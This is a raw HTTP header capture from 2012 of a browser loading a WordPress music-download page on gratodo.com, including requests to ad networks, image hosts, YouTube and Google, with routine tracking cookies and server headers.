Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Disposition: inline; filename=&quot;ad516503a11cd5ca435acc9bb6523536.png&quot;
Date: Sat, 17 Nov 2012 03:12:48 GMT
Expires: Sat, 17 Nov 2012 03:17:48 GMT
Last-Modified: Sat, 01 Mar 2008 02:44:06 GMT
Server: ECS (arn/46E6)
Source-Age: 5281
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 64634807 61781803
Content-Length: 1888
GET /cgi-sys/suspendedpage.cgi HTTP/1.1

Host: megasharev.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sat, 17 Nov 2012 03:12:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /small/00/25.png HTTP/1.1

Host: widgets.amung.us

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sat, 17 Nov 2012 03:12:48 GMT
Content-Length: 318
Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT
Connection: close
Server: Apache/1.1 (Windows 4.00.950)
Expires: Mon, 17 Dec 2012 03:12:48 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GET /wp-content/themes/gratodo/js/effects.js HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sat, 17 Nov 2012 03:12:48 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:43 GMT
Etag: &quot;3b4547-148a-4afd4185517c0&quot;
Accept-Ranges: bytes
Content-Length: 5258
Keep-Alive: timeout=20, max=199
Connection: Keep-Alive
GET /wp-content/themes/gratodo/images/gratodo.com_468x60.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:48 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sun, 25 Mar 2012 16:57:10 GMT
Etag: &quot;5a25cc-15b6-4bc142603e580&quot;
Accept-Ranges: bytes
Content-Length: 5558
Keep-Alive: timeout=20, max=199
Connection: Keep-Alive
GET /wp-content/plugins/ic-besocial/besocial.js?ver=2.0 HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sat, 17 Nov 2012 03:12:48 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:32:56 GMT
Etag: &quot;3b4577-eaf-4afd423d60a00&quot;
Accept-Ranges: bytes
Content-Length: 3759
Keep-Alive: timeout=20, max=199
Connection: Keep-Alive
GET /img810/5122/descargafileserve1e1304.png HTTP/1.1

Host: img810.imageshack.us

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/1.0.4
Date: Sat, 17 Nov 2012 03:12:49 GMT
Connection: close
Content-Length: 16210
Last-Modified: Fri, 07 Oct 2011 15:13:48 GMT
Accept-Ranges: bytes
X-Server-Name-And-Port: _:14000
GET /img696/8326/megauploadlogoc.jpg HTTP/1.1

Host: img696.imageshack.us

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.4
Date: Sat, 17 Nov 2012 03:12:49 GMT
Connection: close
Content-Length: 28887
Last-Modified: Fri, 07 Oct 2011 15:15:25 GMT
Accept-Ranges: bytes
X-Server-Name-And-Port: _:14000
GET /img600/888/eosc1997.jpg HTTP/1.1

Host: img600.imageshack.us

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.4
Date: Sat, 17 Nov 2012 03:12:49 GMT
Connection: close
Content-Length: 21073
Last-Modified: Fri, 11 Nov 2011 11:58:55 GMT
Accept-Ranges: bytes
X-Server-Name-And-Port: _:14000
GET /wp-includes/js/jquery/jquery.js?ver=1.4.4 HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sat, 17 Nov 2012 03:12:48 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 01 Jun 2011 06:55:43 GMT
Etag: &quot;3b4bb5-1331c-4a4a1025a39c0&quot;
Accept-Ranges: bytes
Content-Length: 78620
Keep-Alive: timeout=20, max=199
Connection: Keep-Alive
GET /images/misc/space.gif HTTP/1.1

Host: pordescargadirecta.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 404 Not Found

Content-Type: text/html
Server: nginx/1.2.2
Date: Sat, 17 Nov 2012 03:13:13 GMT
Content-Length: 168
Connection: keep-alive
Keep-Alive: timeout=20
GET /st?ad_type=iframe&ad_size=468x60&section=2565664 HTTP/1.1

Host: adserving.cpxinteractive.com
GET /st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Sat, 17 Nov 2012 03:12:50 GMT
Content-Length: 612
GET /embed/9VLAHAyABVY HTTP/1.1

Host: www.youtube.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
Cookie: VISITOR_INFO1_LIVE=TIoxcizkAQ0; PREF=fv=10.0.45&amp;f4=4000
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Sat, 17 Nov 2012 03:12:50 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Transfer-Encoding: chunked
GET /_/apps-static/_/js/gapi/plusone/rt=j/ver=ZmauHrJi-hM.no./sv=1/am=!lVF6vhgpQzaIV3w7gg/d=1/rs=AItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ/cb=gapi.loaded_0 HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;180778605&quot;
Expires: Sun, 16 Dec 2012 23:09:58 GMT
Date: Fri, 16 Nov 2012 23:09:58 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 26210
Age: 14572
GET /ptj?member=541&size=468x60&inv_code=2565664&referrer=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D468x60%26section%3D2565664 HTTP/1.1

Host: ib.adnxs.com
GET /ptj?member=541&amp;size=468x60&amp;inv_code=2565664&amp;referrer=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D468x60%26section%3D2565664 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:50 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sun, 18-Nov-2012 03:12:50 GMT; domain=.adnxs.com; HttpOnly icu=ChII3I4BEAoYASABKAEwsoGchQUQsoGchQUYAA..; path=/; expires=Fri, 15-Feb-2013 03:12:50 GMT; domain=.adnxs.com; HttpOnly acb892086=-@L6Dj/d_6^qfy.Qz[m]rNx1b?enc=AQAAAAAA_D_NzMzMzMz3PwAAAEDheqQ_zczMzMzM9z8AAAAAAAD8P-nFbpDHTcUNoArzhH1cTlGyAKdQAAAAAMVYAwAdAgAA1gEAAAIAAADiJTwAk8AAAAAAAQBVU0QAVVNEANQBPABn2wAAt0oBAgUCAQUAAIIANSWrvQAAAAA.&amp;tt_code=2565664&amp;cnd=%216R0KhwiTsCcQ4svwARgAIJOBAzAAOOe2B0AASNYDUMWxDVgBYNgGaABwDHgigAFUiAEAkAEBmAEBoAEBqAECsAEAuQEAAAAAAAD8P8EBAAAAAAAA_D_JAYl5On5sycg_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+1317%2C+1353121970%29%3Buf%28%27c%27%2C+645139%2C+1353121970%29%3Buf%28%27r%27%2C+3941858%2C+1353121970%29%3Bppv%281339%2C+%27992284812422071785%27%2C+1353121970%2C+1353726770%2C+645139%2C+49299%2C+0%2C+0%2C+1209600%29%3Bppv%2848189%2C+%27992284812422071785%27%2C+1353121970%2C+1353726770%2C+645139%2C+49299%2C+0%2C+0%2C+10368000%29%3B&amp;ccd=%21cAU_MQiTsCcQ4svwARiTgQMgAA..&amp;vpid=45&amp;creative_click=http%3A%2F%2Fwww.dnafootwear.com%2Fseychelles%3Fsec%3Dwomen%3Futm_source%3DVISISEEK%26utm_medium%3DVISISEEK-RTB-Display%26utm_campaign%3DVISISEEK-Remarketing&amp;media_subtypes=1&amp;dlo=1; path=/; expires=Sun, 18-Nov-2012 03:12:50 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FV*Okf*):kb10I3^brp/%-cHfwr5q'`VH$4w=ef; path=/; expires=Fri, 15-Feb-2013 03:12:50 GMT; domain=.adnxs.com; HttpOnly
Date: Sat, 17 Nov 2012 03:12:50 GMT
Content-Length: 385
GET /wp-content/themes/gratodo/images/logo.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/themes/gratodo/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:50 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:10 GMT
Etag: &quot;3b450f-96a-4afd4165d8d80&quot;
Accept-Ranges: bytes
Content-Length: 2410
Keep-Alive: timeout=20, max=198
Connection: Keep-Alive
GET /wp-content/themes/gratodo/images/rtopbg.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/themes/gratodo/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:50 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:15 GMT
Etag: &quot;3b451a-63b-4afd416a9d8c0&quot;
Accept-Ranges: bytes
Content-Length: 1595
Keep-Alive: timeout=20, max=199
Connection: Keep-Alive
GET /wp-content/themes/gratodo/images/bgmainnavigation.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/themes/gratodo/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:50 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:05 GMT
Etag: &quot;3b4503-44-4afd416114240&quot;
Accept-Ranges: bytes
Content-Length: 68
Keep-Alive: timeout=20, max=198
Connection: Keep-Alive
GET /wp-content/themes/gratodo/images/maincontainerbg.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/themes/gratodo/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:50 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:11 GMT
Etag: &quot;3b4512-156-4afd4166ccfc0&quot;
Accept-Ranges: bytes
Content-Length: 342
Keep-Alive: timeout=20, max=198
Connection: Keep-Alive
GET /wp-content/themes/gratodo/images/whitedot.png HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/themes/gratodo/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sat, 17 Nov 2012 03:12:50 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:18 GMT
Etag: &quot;3b4520-a3-4afd416d79f80&quot;
Accept-Ranges: bytes
Content-Length: 163
Keep-Alive: timeout=20, max=198
Connection: Keep-Alive
GET /wp-content/themes/gratodo/images/bgmainwrapper.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/themes/gratodo/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:50 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:05 GMT
Etag: &quot;3b4504-c6-4afd416114240&quot;
Accept-Ranges: bytes
Content-Length: 198
Keep-Alive: timeout=20, max=198
Connection: Keep-Alive
GET /yts/img/pixel-vfl3z5WfW.gif HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.youtube.com/embed/9VLAHAyABVY
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Tue, 16 Oct 2012 23:01:29 GMT
Date: Fri, 16 Nov 2012 11:57:55 GMT
Expires: Sat, 16 Nov 2013 11:57:55 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 43
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 54896
GET /yts/cssbin/www-embed-vflwCxCa2.css HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.youtube.com/embed/9VLAHAyABVY
HTTP/1.1 200 OK

Content-Type: text/css
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Tue, 13 Nov 2012 18:02:08 GMT
Date: Fri, 16 Nov 2012 11:57:57 GMT
Expires: Sat, 16 Nov 2013 11:57:57 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28745
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 54893
GET /st?ad_type=ad&ad_size=300x250&section=1312813&position=btf&t_url=http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal HTTP/1.1

Host: ts.smowtion.com
GET /st?ad_type=ad&amp;ad_size=300x250&amp;section=1312813&amp;position=btf&amp;t_url=http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Date: Sat, 17 Nov 2012 03:12:48 GMT
P3P: policyref=&quot;/st/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR NID&quot;
Server: nginx
Set-Cookie: suid=&quot;eyJ2ZXJzaW9uIjogIjAuMSIsICJ2YWx1ZSI6ICIwNDk0ZjAwZS1jYjc0LTQ5NDItYjE2Yy03Y2Y5YmI5NTYyYWMifQ==&quot;; expires=Sun, 17 Nov 2013 03:12:48 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 20
Connection: keep-alive
GET /yts/jsbin/www-embed_core_module-vflHovH55.js HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.youtube.com/embed/9VLAHAyABVY
HTTP/1.1 200 OK

Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Thu, 15 Nov 2012 17:53:19 GMT
Date: Fri, 16 Nov 2012 11:57:55 GMT
Expires: Sat, 16 Nov 2013 11:57:55 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 44602
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 54896
GET /wp-content/themes/gratodo/images/h2line.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/themes/gratodo/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:29:09 GMT
Etag: &quot;3b450c-2b-4afd4164e4b40&quot;
Accept-Ranges: bytes
Content-Length: 43
Keep-Alive: timeout=20, max=197
Connection: Keep-Alive
GET /st?ad_type=iframe&ad_size=120x600&section=2565664 HTTP/1.1

Host: adserving.cpxinteractive.com
GET /st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Sat, 17 Nov 2012 03:12:51 GMT
Content-Length: 616
GET /st?anmember=541&anprice=140&ad_type=ad&ad_size=468x60&section=2565664 HTTP/1.1

Host: ad.yieldmanager.com
GET /st?anmember=541&amp;anprice=140&amp;ad_type=ad&amp;ad_size=468x60&amp;section=2565664 HTTP/1.1

